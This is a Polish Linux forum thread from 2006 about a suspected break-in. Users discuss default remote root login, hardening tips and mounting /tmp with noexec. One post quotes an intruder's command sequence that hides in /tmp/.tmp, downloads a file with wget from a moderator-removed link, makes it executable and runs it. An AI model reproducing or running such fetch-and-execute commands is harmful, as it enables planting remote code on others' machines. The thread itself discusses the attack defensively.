Włamanie?

[jaro33]

: możliwość zdalnego logowania jako root (tekstowo i przez GDM) - to jest domyślne ("Ustawienia ekranu logowania", zakładka "Bezpieczeństwo").

też tych udogodnień nie lubię:

możliwość zdalnego logowania

 

nawet temat przyklejony przydał by się jak co odhaczyć , i jakie usługi wywalić

bo ja na ślepo na początku szukałem

 

Narka

Edytowane Marzec 22, 2006 przez jaro33

[@WalDo]

Ech, PM dalej nie działa, więc musze tutaj. _Pat może warto w takim razie również zmoderować fragment mojego pierwszego (drugiego w ogóle w tym wątku) wpisu - średnio inteligentny wielbiciel pingwinów łatwo pożeni zmoderowane wpisy z postu narrowa z moimi wypocinami nt. abuse.

Pozdr,

W.

[Adi1981]

...
cd /tmp
cd .tmp
mkdir .tmp
cd .tmp
wget link_usunięty_przez_modratora/loco1/aVe.txt;chmod 777 *
./aVe.txt
./aVe.txt
...

co radzicie?

 

Zeby uniknąć tego taku wystarczyłoby teoretycznie bardzo proste rozwiązanie, a mianowicie osobna partycja /tmp i montowanie jej z opcją noexec (Tak powinna być zawsze zabezpieczona ta partycja). Niestety jak już wspomniałem to tylko teoria, gdyż w praktyce po zamontowaniu partycji /tmp z opcją noexec nie uruchomi nam się znaczna część programów... (co jest wg. mnie ewidentnym błędem tych programów) :|

[lone_wolf]

Kiedyś czytałem jak hacker wszedł na serwery Gentoo i buszowł tam kilka godzin. Miał pecha bo nie zdążył po sobie śladów pozacierać.

[Albert]

Biorąc pod uwagę datę tematu należałoby już raczej pisać w czasie przeszłym